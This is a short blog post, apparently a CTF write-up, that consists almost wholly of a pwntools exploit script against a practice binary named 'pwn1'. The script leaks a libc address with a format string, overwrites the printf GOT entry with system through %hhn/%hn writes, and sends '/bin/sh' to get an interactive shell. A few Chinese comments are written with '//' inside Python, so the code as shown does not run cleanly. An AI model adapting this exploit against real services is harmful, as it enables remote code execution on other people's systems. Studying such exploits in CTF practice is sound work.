exp分析

1 from pwn import*
 2 
 3 local =1
 4 debug = 1
 5 
 6 if local:
 7     p = process('./pwn1')
 8 else:
 9     p = remote("127.0.0.1",8080)
10 
11 #context.log_level = 'debug'
12 '''
13 if debug:
14     gdb.attach(p)
15 '''
16 def fms(data):
17     p.recvuntil("input$",timeout=4)
18     p.sendline("1")
19     p.recvuntil("please input your name:\n")
20     p.sendline(data)
21 
22 
23 libc = ELF("/lib/i386-linux-gnu/libc.so.6")
24 elf = ELF('./pwn1')
25 
26 fms('%35$p')
27 
28 libc_start_main_addr = int(p.recv(10),16) - 243    #__libc_start_main//?
29 libc_addr = libc_start_main_addr - libc.symbols['__libc_start_main']//?
30 print "libc_addr =",hex(libc_addr)
31 
32 printf_got = elf.got['printf']//got表地址
33 print "printf_got =",hex(printf_got)
34 
35 system_addr =libc_addr + libc.symbols['system']//symbols['system']函数地址
36 print "system_addr =",hex(system_addr)
37 //ELF模块
38 #make stack
39 make_stack = 'a' * 0x30 + p32(printf_got) + p32(printf_got + 0x1) 
40 fms(make_stack)
41 #gdb.attach(p)
42 
43 payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn"
44 payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn" 
45 print "payload=",payload
46 
47 fms(payload)
48 fms('/bin/sh\x00')
49 p.interactive()

 

posted @ 2017-12-12 21:29  S_s_s  阅读(243)  评论(0编辑  收藏